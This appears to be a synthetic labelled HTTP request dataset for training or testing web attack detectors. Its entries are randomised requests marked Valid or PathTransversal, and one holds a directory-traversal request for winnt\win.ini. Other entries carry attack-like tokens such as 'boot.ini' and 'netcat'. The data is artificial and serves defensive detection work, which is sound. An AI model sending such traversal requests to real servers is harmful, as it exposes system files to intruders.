Range: 11-
Referer: /pnI1ofre/6tgL.shtml
TE: gzip,gzip;q=0.7,chunked
Trailer: If-Unmodified-Since
User-Agent: Mozilla/7.7 (Machintosh; U; Mac OS X 9.4; io-h3; rv:6.4.2) Gecko/16481389
UA-CPU: MIPS
UA-Disp: 5387,1102,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 0470x877
Via: hDzyep/5.5 189.152.160.71:57
Transfer-Encoding: deflate
Upgrade: npelr/9.1, ir3/9.6, trmYd/3.9, egD/1.4, hafn8/5.0
Warning: 479 211.56.14.116 "qeorie44toHnoseg46" 
X-Forwarded-For: 55.147.33.124
X-Serial-Number: 265535777881770929
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48760
Start - Id: 18718
class: Valid
GET /daittleakinhfkm/iu@RMl8@bJl/jC5RJ/d8yE4Yl7gXi.js?e2dwnqtduoI6t=14652&ce=oHykaccess_logidecho&anuLecsrjio=yi5tTrpepw&hgnsa3OextlmnoE=64950 HTTP/1.1
Host: www.aeowyAldoe.st
Connection: keep-alive
Accept: application/*;q=0.9
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: Rnjfosss='nni1oa'
Client-ip: 151.170.233.194
Cookie: lmnetieeoa=3252;tase7ce=oMNIjqa.
Cookie2: $Version="743"
Date: Mon, 12 Jun 06 11:29:09 CET
ETag: W/"zvnk41a5Tn4k1k8ZK"
Expect: 100-continue
From: useStO@hehn.uk
If-Modified-Since: Thu, 23 Nov 06 22:50:54 UTC
If-Unmodified-Since: Thu, 17 Aug 06 01:40:43 GMT
If-Match: "u8m7Nllv521wbyBQ_sHM"
If-None-Match: *
If-Range: *
Max-Forwards: 867
MIME-Version: 0.0
Pragma: e='vc'
Proxy-Authorization: Basic bW5udHphbTpSUmFqaQ==
Authorization: trle5 tmal=ehihl8nE
Range: -0
Referer: /git9sa/os5eif/tmh1/dnwpb/ah5cr.rar
TE: trailers
Trailer: If-None-Match
User-Agent: eeQio8cH8 http://www.ea4ua.st
UA-CPU: MIPS
UA-Disp: 646,604,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 4616x9503
Via: HTTP/4.4 www.ac9sdrss.css
Transfer-Encoding: compress
Upgrade: ayiai/8.8, ryiyaS/1.2
Warning: 464 209.65.87.36:429 "aor5ldpxtaehio3" 
X-Forwarded-For: 225.250.72.17
X-Serial-Number: 317895
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18718
Start - Id: 28543
class: Valid
GET /surpsdrfactsa4md2/6KhZVcatZ3dtaI/h@Ed4bhyQ.css?Xzv8autoexecBCKz=540&Aamst=3NCqntC.LL&ue=ete&8dropDR=bin68tanc%29%5Dn+hereplace&esceet1naeena=043586799 HTTP/1.1
Host: www.nGnase.st
Connection: close
Accept: text/*;q=0.6
Accept-Charset: x-mac-arabic;q=0.3, x-mac-chinesetrad;q=0.5, windows-1257, utf-8, iso-2022-jp
Accept-Encoding: gzip, deflate;q=0.5, gzip;q=0.9, identity;q=0.3
Accept-Language: *
Cache-Control: no-store
Client-ip: 81.119.248.8
Cookie: bz=hb3aVsUJ;NrejkdE=Cne-b
Cookie2: $Version="180"
Date: Sun, 28 Jun 09 04:38:02 CET
ETag: W/"d8l7kAzDFiLNc-Wyw3GV"
Expect: qndes
From: tuezrt@nexhlht5a.it
If-Modified-Since: Sun, 02 Nov 08 02:35:25 CET
If-Unmodified-Since: Mon, 29 Aug 05 11:57:43 CET
If-Match: *
If-None-Match: "6BSRBGQdCE9kRZ3"
If-Range: Sun, 24 Jan 10 18:26:49 GMT
Max-Forwards: 5
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: Basic aWpzZ2Zud3A6Z1NlbG56
Authorization: Digest nonce
Range: 6-267184,-1,5-7119
Referer: http://www.tdsiqpjx.gov/inrr/ewIurMnn/etOemf/tt9owee/vohm4nl.html
TE: trailers
Trailer: Accept-Charset
User-Agent: euUnEts7IG
UA-CPU: PowerPC
UA-Disp: 3600,6698,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 6545x8948
Via: 3.7 www.IIviet.css, 2.0 184.90.30.163, HTTP/2.3 234.208.45.254
Transfer-Encoding: 5ints
Upgrade: 8omcl/7.6
Warning: 013 38.161.125.54 "rsGoemitnia" 
X-Forwarded-For: 199.127.83.69
X-Serial-Number: 37650652134780806
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28543
Start - Id: 8444
class: Valid
GET /oGxg/t4ubxUT5wt.tv--3/3poofyxi.jpg?RPCWOJmocha1Fsystemh=4abn&HoSO=nvncb2bg&bhj8bPozamlrtro=z&ar6=ahuaOaa&s5eadcak1bg=00047597&Eec=2031&AsGt=sje7ievLt&eRtSj9ers=uA8nnwMboszoe7&yeacbhaitnypo=nZ9%40tnQd&8MkLIhttp9T-=70183&siserribhSTe1=llinkhrstdine&UeX3fjHjX=r&lootlcr=%28hsznetCk1%3EiElstmps&innec=8 HTTP/1.0
Host: 165.17.13.12:80
Connection: close
Accept: */*
Accept-Charset: x-mac-ce, x-mac-ce
Accept-Encoding: compress, identity, deflate;q=0.1, compress, compress
Accept-Language: hoeau-zEiaeee2, o2-eae9ild, elajsare-oami;q=0.8, hida68-e9nt, aD-l
Cache-Control: max-stale
Client-ip: 1.187.91.46
Cookie: iomsld6tree=uet&8o2Nh w1pbhtnr;enao=53765702;CZFY= ic4no1jd oclos;1pdt3iis=cqEss;ntlhuEItdhgmu=gRner
Cookie2: $Version="70"
Date: Mon, 26 Apr 04 09:46:59 GMT
ETag: "@.9_@dTtpVgxi.6nak"
Expect: 100-continue
From: sHet@bygd.gov
If-Modified-Since: Sat, 31 Mar 07 18:53:10 GMT
If-Unmodified-Since: Thu, 05 Jul 07 01:11:12 CET
If-Match: "3R8f9GqIckHSsEdK2-"
If-None-Match: *
If-Range: *
Max-Forwards: 523
MIME-Version: 2.0
Pragma: Rqax='csarr'
Proxy-Authorization: Digest uri=http://xiaeia.gov/enhdtrl/gbbnahb.html
Authorization: NTLM c3BwbnN5bnR4dmhpdHRhbm9pOXU4ZW9vaW90aXd4bHJ3b2Rsa1NlZXRoaWZB
Range: -418
Referer: http://n3uoeuq.biz/roef/ei2ee/dduohnee/3crd4ddk/ow2t4i.jsp
TE: deflate,trailers
Trailer: From
User-Agent: Mozilla/5.2 (Machintosh; U; PPC 4.3; as-li; rv:1.7.4) Gecko/19856128
UA-CPU: Sparc
UA-Disp: 3788,441,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 3083x039
Via: FTP/2.5 www.n6gsadi.shtml:489, ujdi/1.3 252.1.19.44
Transfer-Encoding: deflate
Upgrade: pds/0.2, 5souN/0.2
Warning: 701 www.efiqn.jpg "h2nh5chdrzlef" "Mon, 14 Feb 05 17:53:20 CET"
X-Forwarded-For: 24.38.239.223
X-Serial-Number: 95629658613449459572
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8444
Start - Id: 13052
class: Valid
GET /0lEscriptY6Q_tv0txz.tiff?netsrcw=ihnai&sIpnlyhtr=vmcopylgn&qW@oAQa5ys0G=sbdortEIale&ennloifR=97&difto=54&iihDepu=e&AseoUl=938261&ehhDs=+&qyom2aa9=%5B%5DoFconnect8+&dl=dtekar HTTP/1.0
Host: www.tstaenei.com
Connection: close
Accept: text/xml
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: min-fresh=15
Client-ip: 215.148.83.171
Cookie: RYRlpJTB=beitla
Cookie2: $Version="1"
Date: Fri, 10 Jun 05 03:47:47 UTC
ETag: "k6Rz_Brjk51mCbFOTDRi"
Expect: 100-continue
From: bitj@a9rdso.be
If-Modified-Since: Sat, 22 Jul 06 06:42:27 GMT
If-Unmodified-Since: Thu, 02 Jul 09 06:23:14 UTC
If-Match: "1vtbHW@uCo64sT_"
If-None-Match: *
If-Range: Mon, 01 Feb 10 10:23:31 CET
Max-Forwards: 1
MIME-Version: 8.1
Pragma: lra=bn7L
Proxy-Authorization: Ycxr satemsyr=pveoeaeo
Authorization: Digest nc=eB5F2312
Range: 309-6,-2
Referer: /tatne6mb/ntbt/fea0.swf
TE: chunked
Trailer: If-Unmodified-Since
User-Agent: rheQ-2 http://www.neaeso.uk
UA-CPU: 68000
UA-Disp: 271,129,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 011x9947
Via: HTTP/2.9 www.aoOneomc.jpeg, 3.3 111.33.125.159:99194, HTTP/2.2 237.253.252.157:55867
Transfer-Encoding: deflate
Upgrade: uede/9.7
Warning: 628 www.nttty.js "cnhetkwotorseofg3" "Sat, 23 Jun 07 05:37:50 GMT"
X-Forwarded-For: 68.38.52.84
X-Serial-Number: 11062
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13052
Start - Id: 2061
class: Valid
GET /t4FbMmMlHimkfZwe/e8BL48-Mpt/nz.gw0J7BYKe5tv/hayc/ah7PqUgiyUg/_3R/aSEYN8YbrBn6mJ/depfmr4rtoh6saAnts/dttdhra/uni5eRseailklie/gVrqYMHmQZ9_sUypfw/atTyplttRwlhnettae.aspx?nnev=ftewsrsentUny&c1=4000279214 HTTP/1.0
Host: www.4hctepir.gov:80
Connection: nvaan
Accept: image/*;q=0.8, audio/basic
Accept-Charset: iso-8859-8-i, x-mac-chinesesimp
Accept-Encoding: gzip, compress;q=0.1, deflate;q=0.2, compress, deflate;q=0.3
Accept-Language: *
Cache-Control: t=mori
Client-ip: 243.4.248.171
Cookie: OocN=ami-muohopteRdb
Cookie2: $Version="2"
Date: Wed, 09 Feb 05 20:04:23 GMT
ETag: "CqKJhzj3js0ETbABe"
Expect: eteeotl
From: wDshh4eU@hl5stetee.com
If-Modified-Since: Fri, 28 Mar 08 14:15:11 GMT
If-Unmodified-Since: Thu, 11 Oct 07 04:55:07 UTC
If-Match: "eLOhbSt9teIsT7m@BcL"
If-None-Match: "FH1BXVk_.kBkzKd1c"
If-Range: Mon, 28 Dec 09 23:24:09 CET
Max-Forwards: 34
MIME-Version: 1.2
Pragma: no-cache
Proxy-Authorization: sgUhr eKit=0iDeacaT
Authorization: Basic dHd0ZXJhOmVsdVV0cGY=
Range: -586766,7072-,732551-
Referer: http://pOst.uk/eEwpfqpi/hhse/ibKitw/hrghps5r/suOs.jpeg
TE: trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: slthg (rHVnM@nB4)
UA-CPU: StrongARM
UA-Disp: 0185,510,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 008x3318
Via: FTP/4.3 181.219.253.205:26980
Transfer-Encoding: deflate
Upgrade: wleh/1.8
Warning: 344 www.BJasytN.css "r0la5" 
X-Forwarded-For: 242.10.119.24
X-Serial-Number: 82872435333808
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2061
Start - Id: 21264
class: Valid
GET /ntiUij3d2i/xbiSmvpttarl0hsu/U20q1/rjrDMVj4q1dSZ/rhro32fiornod4hr9g.msf?nooes2i=n6a&aBHk2F6Njq=637387&gR0nratrerzrsis=12639208&35o=a8JhB HTTP/1.1
Host: 42.73.210.103:54059
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *;q=0.4
Accept-Encoding: gzip, identity;q=0.3, gzip;q=0.6, gzip;q=0.9
Accept-Language: *;q=0.5
Cache-Control: min-fresh=96945
Client-ip: 133.200.177.186
Cookie: rkh2laanb=oselectpositioninsertyp40t h i9oin;dsrwa4araanmttu=e1ehnmailtmprD-;als=ecm;miitihHnedra=643279;hnl5s=inltcshTe;itdKbstlaanu8=O;eedcbtr7s
Cookie2: $Version="6"
Date: Fri, 14 Dec 07 21:21:56 CET
ETag: W/"gMjAFm7vpncaZN10URyx"
Expect: ueuamw=t7or
From: t0lhS@waohyqlaao.net
If-Modified-Since: Thu, 23 Nov 06 11:17:39 CET
If-Unmodified-Since: Wed, 25 Jul 07 06:57:43 CET
If-Match: "KgDkcjh7O3w3Wl-TkXSz"
If-None-Match: "U2JLLedqAQnUmfF"
If-Range: Wed, 20 Apr 05 24:16:43 UTC
Max-Forwards: 8
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: Digest username="ounet"
Authorization: Basic czRpaGNwYW86c3kxdm1haA==
Range: 793-,8602-038713,9-
Referer: http://www.eaeuzDho.st/etlhtads/xdao4/leld/psUR/eoie.wav
TE: trailers
Trailer: Date
User-Agent: Mozilla/7.8 (Windows; U; Win98 3.7; 8e-ll; rv:7.8.1) Gecko/79521199
UA-CPU: PowerPC
UA-Disp: 664,7142,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 8293x354
Via: FTP/6.7 www.psuSaisc.png:79636, 8.5 107.248.148.114
Transfer-Encoding: gzip
Upgrade: yyiKl/3.7, it7/7.9, ehn/2.1
Warning: 469 180.84.229.18 "oEiemdthie3uEjrey" "Sun, 17 Dec 06 24:08:21 CET"
X-Forwarded-For: 185.82.248.52
X-Serial-Number: 900444
----: --------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 21264
Start - Id: 28059
class: Valid
GET /ahsR5anrEeisar.nsf?Sekb3c3tagsBet=moCareuilaw&cjDmQB=7386166&fwe=19596&O3W9EozZlibg6B=475015&enuTgtks3qO=rdltdteyBzntErw&deEorHt=amm&wihuhrhd1bi6=n%24O6&nheavedlitrilt1=0982173916 HTTP/1.1
Host: www.jgcdrt.de:80
Connection: close
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: compress;q=0.9, compress, gzip;q=0.7, gzip;q=0.5
Accept-Language: e-wor;q=0.9, 7Els6sy-q4dibo, susdse-dhianoT4;q=0.5
Cache-Control: no-transform
Client-ip: 106.176.170.46
Cookie: 9processing-instructionDaSB1Fg=jnullboot.ini]doa$;qOord1kOK3=~e
Cookie2: $Version="63"
Date: Sun, 12 Jul 09 21:29:08 CET
ETag: W/"8jQIu9B@UcxUE_Ne"
Expect: E7eTASl
From: gu9cDaia@ar6it9.st
If-Modified-Since: Sat, 22 Jan 05 19:26:34 CET
If-Unmodified-Since: Fri, 07 Dec 07 04:10:50 UTC
If-Match: "C-1kFzBaGkMwwe6jO"
If-None-Match: *
If-Range: Fri, 28 May 04 19:55:07 UTC
Max-Forwards: 3155
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Basic dW5uYzp6b2NhRFRl
Authorization: Digest algorithm=MD5-sess
Range: -570
Referer: /wci7Aibn/wl2et/nmal/oenla.js
TE: chunked,gzip;q=0.0
Trailer: Host
User-Agent: Mozilla/6.1 (compatible; Konqueror/0.6; SunOS sun4u; obhut)
UA-CPU: StrongARM
UA-Disp: 352,634,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 2111x3686
Via: 7.6 211.135.153.24, 5.2 www.foUtfElx.gif, 4.2 www.hnbTwh.tiff
Transfer-Encoding: identity
Upgrade: mt50n/6.1, frlaru/6.7
Warning: 759 www.rcgyueh.tiff:5 "wolidasoknadsaeahf" "Sun, 27 Jul 08 14:28:37 UTC"
X-Forwarded-For: 140.27.28.161
X-Serial-Number: 981815102258
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28059
Start - Id: 5837
class: Valid
POST /OxnscOctehcglyr.swf? HTTP/1.0
Content-Length: 176
Content-Language: ebfe8a,idole,uaseE
Content-Encoding: deflate
Content-Location: http://www.soaeirwj.ch/eaemdr/5ohs8ta/trRw/DLtautfp/tntbds2.jpeg
Content-MD5: U1dmZHFsY3d5cG5yc3lzYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 14 Oct 04 16:07:49 CET
Last-Modified: Sat, 27 May 06 23:22:14 UTC
Host: 42.36.82.24
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: max-age=98
Client-ip: 138.176.20.40
Cookie: ea7e=471;LkSluqCi=98;feioSO=SnatFI8qleequlrehu;cc=v2ns6fDhOqhe;atigshdcneW=nOSt;vpacceptY6nYaPD=eatv>f thSd 
Cookie2: $Version="141"
Date: Wed, 21 Apr 04 24:44:35 UTC
ETag: W/"4xTR0hwI4@WsOot@zvMm"
Expect: 100-continue
From: sePnirh@e4qne.de
If-Modified-Since: Sun, 15 Aug 04 15:57:31 GMT
If-Unmodified-Since: Wed, 15 Oct 08 23:48:33 GMT
If-Match: *
If-None-Match: "8UbUHydHktmNpkISvj"
If-Range: Fri, 05 Nov 04 15:34:58 GMT
Max-Forwards: 3
MIME-Version: 8.7
Pragma: a=agDazhx
Proxy-Authorization: NTLM dHdzcGVzcnZudGhiTmhlbXRkaGZkZXJvOXBrMGhjZXN1MmFyaHRubm8=
Authorization: Digest response="98504c5a4d45fdA13571776bDf99Cff8"
Range: 4-,812-694413
Referer: http://ebatqllm.biz/tnnoPnw1/pw4ea.sh
TE: deflate;q=0.2,trailers,trailers
Trailer: Range
User-Agent: Mozilla/0.3 (X11; U; Open BSD i586 7.0; r3-el; rv:0.3.5) Gecko/88729530
UA-CPU: 68000
UA-Disp: 6831,2908,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 3215x099
Via: 0.3 www.bdt6h3dr.png
Transfer-Encoding: compress
Upgrade: e4c/1.1, hhpf/8.4, n1mot/3.4, n6dla/3.5
Warning: 161 210.131.126.108 "bzrjUioaiertes" "Tue, 24 Jun 08 01:01:36 GMT"
X-Forwarded-For: 10.142.82.192
X-Serial-Number: 8692230651
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

rthbtewhlhog1es=402&T7tm3jr=nDRGvtG&etomexsupde=nAxNitxaen&arnoaeU3u7n=09&d0=066&Swe5td26zhg=r9BjoFEtuIB&7aoTaiiafanx3=veoandie wn3t&1ootstnplhM=wlesah&t7=&fhdo8httplms et>

End - Id: 5837
Start - Id: 45090
class: PathTransversal
GET /error/\..\..\..\..\winnt\win.ini? HTTP/1.0
Host: www.nAettOnv.biz
Connection: keep-alive
Accept: text/xml
Accept-Charset: *
Accept-Encoding: *
Accept-Language: iyEihr-Taa7kahr;q=0.1, nyGeta-o77atN
Cache-Control: no-transform
Client-ip: 217.208.54.150
Cookie: 6fofT3ben=gqQo1;ea1smudacAs=rmOwTnha3dt 
Cookie2: $Version="8"
Date: Mon, 03 Jul 06 09:35:35 GMT
ETag: W/"lZRSKosY.s45V9ZcHcP"
Expect: 100-continue
From: NT7ihoi@svOy.it
If-Modified-Since: Wed, 30 Nov 05 11:41:10 CET
If-Unmodified-Since: Mon, 20 Mar 06 13:02:50 GMT
If-Match: "m7e8SWEORE3SARe6"
If-None-Match: "gAja489I21QsH_zgF6bm"
If-Range: Sun, 11 Mar 07 04:04:23 CET
Max-Forwards: 80
MIME-Version: 2.7
Pragma: ly4z='pj'
Proxy-Authorization: Digest cnonce="lEha"
Authorization: Digest nc=aC1a3Cc9
Range: 61-,599945-,96-
Referer: http://www.h8tee.uk/iSan3/tnsc.pl
TE: trailers
Trailer: Connection
User-Agent: Mozilla/2.4 (X11; U; Unix 0.2; 5i-Lc; rv:6.3.3) Gecko/44398517
UA-CPU: StrongARM
UA-Disp: 0628,6146,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 213x015
Via: 2.1 www.nmIjfen.jpg, 6.3 54.170.128.53
Transfer-Encoding: identity
Upgrade: ttpNf/8.4
Warning: 131 165.136.34.196 "tchbajdsaa" "Fri, 12 Mar 10 18:52:44 CET"
X-Forwarded-For: 211.43.232.104
X-Serial-Number: 95535933478300
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45090
Start - Id: 10966
class: Valid
GET /iswzl_SswL/a42ye6dselbaiQax/eBWxVDf9R6.0Oe/ia/Hoef1k/eA32TnTmxQHdy3ag1X.php?iiUceNcm=82&oioThAormteI=0323147&wUqiOeXosxfIdlr=ttShnuf&8@HoDlGcmd7WYlog=ceaut&mni=e+%40osdhs+e2eedocumentWosh&1bmOsst3sAbqrto=%2Fz%3DNn HTTP/1.1
Host: 96.12.89.133
Connection: lneo
Accept: video/mpeg;q=0.3, text/html, application/*;q=0.3
Accept-Charset: iso-8859-15;q=0.3
Accept-Encoding: 
Accept-Language: not-Ih;q=0.3, 24aat-o6aaoko;q=0.5
Cache-Control: only-if-cached
Client-ip: 240.57.142.227
Cookie: oNt=e<oat4insertRu;ipkeGgHsarEsa=bGusocadmot7HeceDt;3hzDr@A=9819
Cookie2: $Version="631"
Date: Sat, 03 Mar 07 03:18:38 GMT
ETag: "s6P-7dH5qnd_FGuXy5zE"
Expect: tfxqs=evn5el;elajee
From: eidl@nam2P.com
If-Modified-Since: Fri, 24 Feb 06 19:18:36 CET
If-Unmodified-Since: Sat, 06 Sep 08 06:26:43 GMT
If-Match: "Kn2NaxlW6DAsKqnS"
If-None-Match: "6mB0gjGcBLDr@qn@oE4m"
If-Range: "Brhm.t6ErEtNc_L"
Max-Forwards: 108
MIME-Version: 6.9
Pragma: se=Jro
Proxy-Authorization: eId3 crbpre=acprrse
Authorization: Basic aWlldWdTbmU6dGlPaQ==
Range: 459-,-939336,-414577
Referer: http://www.ElsWne.net/otsebt/o72l/eaaop/yets3dm.png
TE: gzip,trailers
Trailer: If-Match
User-Agent: Mozilla/6.6 (Machintosh; U; Mac OS X 5.8; Ce-dl; rv:4.3.3) Gecko/61013886
UA-CPU: Sparc
UA-Disp: 487,6380,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 0977x0874
Via: 3.5 www.sydFo.html, FTP/5.6 www.s04cyhit.js
Transfer-Encoding: deflate
Upgrade: sgsic/5.6, ntlan/7.1, 6jase/6.4
Warning: 455 www.jeonsr.htm "easchrhbeywpmR3" 
X-Forwarded-For: 237.166.249.162
X-Serial-Number: 17087592
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10966
Start - Id: 29465
class: Valid
GET /oJxD2WUK39jVY/i7/guKkWP/ueLchildstdinMNWDmY4pL/bdOtemb.shtml?nlBTy975=swp-6eR&cromc3onsttexv=599156204&0eiihEkyhyhbi9=desn&bQTJservices=o%40V&ScOAuafmvE=CLnnTtos+end&erbcmda=770461052 HTTP/1.1
Host: www.g2ypl1.it
Connection: keep-alive
Accept: audio/x-wav;q=0.3
Accept-Charset: *
Accept-Encoding: *
Accept-Language: hsssnpn9-Sedcl53i, om-h0ri, nSaoy-krmmD6;q=0.7, euaE9qi-dlgsot4;q=0.7
Cache-Control: no-store
Client-ip: 116.170.163.175
Cookie: ts-XUJUXU=cc@SXnGY;ir=168810134;euoie5eRdaoi=n tmadmine65he;r1amnu=nn8lzX0Ts;@B@DacceptT49htacces=44092;Cnitbgda=iiuskls3intrzt16
Cookie2: $Version="749"
Date: Sat, 26 Nov 05 03:47:52 GMT
ETag: "xLrsNsTOPTUionq"
Expect: mtsvart=rtdaer;Ajtt4Ne=ndsnet5
From: 3eefJz@tepiieo.org
If-Modified-Since: Mon, 22 Nov 04 15:55:47 CET
If-Unmodified-Since: Wed, 01 Jul 09 04:23:33 CET
If-Match: *
If-None-Match: "pmyzIbzL9D8RBwv7tmuS"
If-Range: Thu, 02 Jun 05 19:34:57 UTC
Max-Forwards: 64
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: oesya nAdau=xhbeoav
Authorization: NTLM YXI0b3duY2huZXNCYXNudG9penkyeG1iM3Vod2RPZXZpdGhrZGVz
Range: 79719-,-15,5725-6080
Referer: /nlOEgsor/2vAsf/9Hl3/tsxie.jpg
TE: trailers,deflate;q=0.7
Trailer: From
User-Agent: Mozilla/5.3 (Windows; U; Win98 5.5; te-yh; rv:3.2.9) Gecko/00492237
UA-CPU: Sparc
UA-Disp: 206,807,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 6889x7208
Via: 3.2 187.167.192.13:960, FTP/3.7 252.143.94.50, HTTP/8.9 46.67.193.133
Transfer-Encoding: deflate
Upgrade: s1t2mc/5.1, ien6g/6.9, eou/7.3, wnt/9.2, inbt/4.4
Warning: 434 www.3rmtd.png "yvs9tz" "Fri, 05 Aug 05 19:35:36 GMT"
X-Forwarded-For: 160.172.24.250
X-Serial-Number: 801273405
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29465
Start - Id: 5398
class: Valid
PUT /V1DYP8CtdZ_ja/gxmjnetcat@e/oirrlsnnm/enhV3.msf? HTTP/1.0
Content-Length: 77
Content-Language: d2,s,yOehohly
Content-Encoding: gzip
Content-Location: http://www.ephxed.ch/le7dsee/ewwcn/teiXnt/miow.pdf
Content-MD5: dXN1YXVveHJlc250ZWR1Zw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 05 Oct 04 04:30:51 GMT
Last-Modified: Mon, 15 Jan 07 13:35:03 GMT
Host: www.T69shr.net:80
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: gb2312;q=0.1
Accept-Encoding: *;q=0.4
Accept-Language: a-ao;q=0.6, Wckhrz-eiafoien, r-nlr, hRsx-othmnH
Cache-Control: no-cache
Client-ip: 49.138.242.29
Cookie: jt=IOe(
Cookie2: $Version="0"
Date: Tue, 15 Mar 05 05:51:08 UTC
ETag: "Yvs2zOQ_Wa5zcsw"
Expect: heue
From: heif@92m3ed.fr
If-Modified-Since: Tue, 23 Nov 04 24:49:19 GMT
If-Unmodified-Since: Sun, 10 Apr 05 11:26:37 GMT
If-Match: "NQBokgsdNGLa51rKg4"
If-None-Match: ".x-KqWpVN-MsP2vt"
If-Range: Wed, 13 Feb 08 24:01:36 CET
Max-Forwards: 47
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: Basic bWNlZUdjOm5nY2k0dGhh
Authorization: Basic cnV5ZWpheTpySWlu
Range: 18375-6599,-64,09092-
Referer: http://www.iivg.net/snbe/oAgoUd/torfn7/02Nue2/eeidUle.wav
TE: deflate;q=0.2
Trailer: Expect
User-Agent: Mozilla/1.1 (X11; U; SunOS sun4u 1.2; 9r-ae; rv:6.4.3) Gecko/75756335
UA-CPU: x86
UA-Disp: 725,766,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 237x186
Via: HTTP/2.5 www.rncypi8.shtml, FTP/2.1 www.dtCsn.html, 4.4 243.206.160.219:94411
Transfer-Encoding: identity
Upgrade: t4mc/3.8
Warning: 771 24.33.242.71:14 "tear3zyE23loeliir" 
X-Forwarded-For: 72.151.254.224
X-Serial-Number: 028740747069773
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

wvraderirocy6=l e&1XOHDm3dSe=epchild  &7othyo5Id0rk=+fqtn&ez=ecnSetsWh4ioeb

End - Id: 5398
Start - Id: 15869
class: Valid
GET /sNya3q51ee3fo8sql/_Qqos.g9oSaV/eZU4Loq/eL6G_iFaR/me.jsp?5GEXiaKitk4=7ti&mdstheedt=o-+%3Areplace&enoTqwereDw=e%3Dl%3Bdpsvlikehd%5C+ahybXe%27r&tcone=8071&bgsoundWPXO=871862&f_I.b.Qnv=enno&OXNYl6=bxFc2.eYrMC&aoq=NuyiLhlydoa4ecuer4&tsux8e=mdeiesahoenrtI&mr5etae=%25r HTTP/1.0
Host: www.eeawG7jnte.org
Connection: close
Accept: application/x-tar;q=0.3, application/postscript;q=0.7, image/*
Accept-Charset: iso-2022-kr
Accept-Encoding: 
Accept-Language: *
Cache-Control: bu='dTziah'
Client-ip: 5.20.235.84
Cookie: eoch4i9dayen=27 ein1uBhedeleteno;dsedaySU5aSazh=r-lklHbN
Cookie2: $Version="629"
Date: Sun, 07 Mar 04 05:42:19 UTC
ETag: W/"RMcT4tkLPvog1osWLHoI"
Expect: 100-continue
From: oh9y8fhi@dik4gedttt.ch
If-Modified-Since: Tue, 17 Feb 04 20:33:51 GMT
If-Unmodified-Since: Sat, 13 Dec 08 11:47:04 UTC
If-Match: "CyDQ4Maak7zRh0Ad"
If-None-Match: *
If-Range: Mon, 05 Apr 04 21:21:12 CET
Max-Forwards: 1
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: NTLM c3JibW50YWVpdDdpSWRzc2FpdHJSdmFleWFzb0J0RHVhYXM2dDI=
Authorization: Digest nc=C6b3600e
Range: 782037-,-78,7952-96
Referer: http://tn58i.cz/eimt/lOno.jpeg
TE: trailers
Trailer: TE
User-Agent: Mozilla/4.8 (compatible; so6wtSn2ae; Open BSD i386; eoedB7; eyene; rdahfyno8)
UA-CPU: StrongARM
UA-Disp: 318,100,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 901x093
Via: HTTP/2.0 www.ets6eitH.gif
Transfer-Encoding: compress
Upgrade: ae5a/2.7, top/0.4, ml19a/6.1, llc/5.5, otta/2.3
Warning: 852 www.Fiwtsn.shtml "ihfsh8jdypliiiwuwpzx" "Sun, 04 Jan 09 23:10:37 GMT"
X-Forwarded-For: 188.189.177.85
X-Serial-Number: 828350
----: ------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 15869
Start - Id: 13165
class: Valid
